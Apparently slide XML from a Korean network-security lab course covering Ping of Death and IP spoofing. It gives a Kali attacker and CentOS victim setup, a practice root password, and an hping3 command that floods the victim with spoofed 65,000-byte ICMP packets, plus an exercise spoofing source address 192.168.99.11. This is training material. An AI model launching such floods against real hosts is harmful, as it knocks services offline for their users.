              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Ping of Death</a:t>
            </a:r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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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Ping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패킷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(ICMP Request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패킷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에 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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대용량의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data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를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Fragment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단위로 분할시켜 송신하고 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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공격 대상이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data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를 수신하고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Fragment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를 재조합 할 때 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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CPU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에 과부하 현상이 나타나게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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하시오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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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   &lt;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실습서버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  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계정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: root / toor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="7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-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PoD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공격을 수행할 수 있다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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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PoD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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공격을 탐지하고 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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000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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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sv-SE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Attacker(Kali linux / 10.10.1.166)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" sz="10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lang="sv-SE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Victim(CentOS 6.4 / 10.10.1.101)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11FC6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01" t="17407" r="19467" b="25308"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717195" y="3461755"/>
            <a:ext cx="456918" cy="463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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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2319826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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="1252538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en-US" altLang="ko-KR" sz="1000"/>
              <a:t># hping3 --icmp --rand-source 10.10.1.101 -d 65000 --flood</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="1810512"/>
            <a:ext cx="5616792" cy="4675628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en-US" altLang="ko-KR" sz="1000"/>
              <a:t># acheck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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6145" name="_x247861960">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE5B1772-AE20-40D4-AB99-B8FEFF46C4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180" y="737616"/>
            <a:ext cx="5400675" cy="512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_x247861800">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68957771-1FAD-43FE-890B-8B609D17DC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832" y="2414016"/>
            <a:ext cx="4008438" cy="49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18896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E12DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>학생 화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인</a:t>
            </a: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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>관리자 화면에서 왼쪽 ‘교관 공격‘ 탭 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격하고자 하는 해당 문제번호와 할당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 확인 후 체크박스에 체크를 하고 공격실행 버튼 클릭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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 실행’ 버튼 클릭 시 아래와 같이 완료 화면이 나오고 공격상태가 ‘공격 중’ 으로 변경 됨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16AF5780-4CBF-4818-A7ED-A29178744D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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70375197-22D4-49A9-80A3-09AA59E55E97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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70585ED-F006-4A17-AC42-528EB3578FCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F43B545-E59E-47F8-8221-ABAE840F983B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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8195" name="_x208263200">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A08186A6-3DB0-4F8E-B9EF-FF437F7553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180" y="4096256"/>
            <a:ext cx="5400675" cy="168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7" name="_x208263760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26418D75-9CC4-47C1-A243-5F1DFD1A47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1262" y="679233"/>
            <a:ext cx="4221163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9" name="_x208262880">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C1B1EE-0438-4C58-9D22-CEC352F87B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1262" y="1958793"/>
            <a:ext cx="5400675" cy="1700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화살표: 오른쪽 14">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00733412-9AE5-4585-8405-12AC612CE9B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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169" name="_x247862600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1841E6-EA38-474D-9DB2-C49CFA51FD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063" y="890016"/>
            <a:ext cx="5400675" cy="1444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52151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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. IP Spoofing</a:t>
            </a:r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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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IP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주소가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10.10.1.101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인 서버를 대상으로 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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플러딩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공격을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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수행하시오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>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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이 때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IP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주소를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192.168.99.11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로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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스푸핑하고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</a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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데이터 크기를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100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바이트로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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설정하시오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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
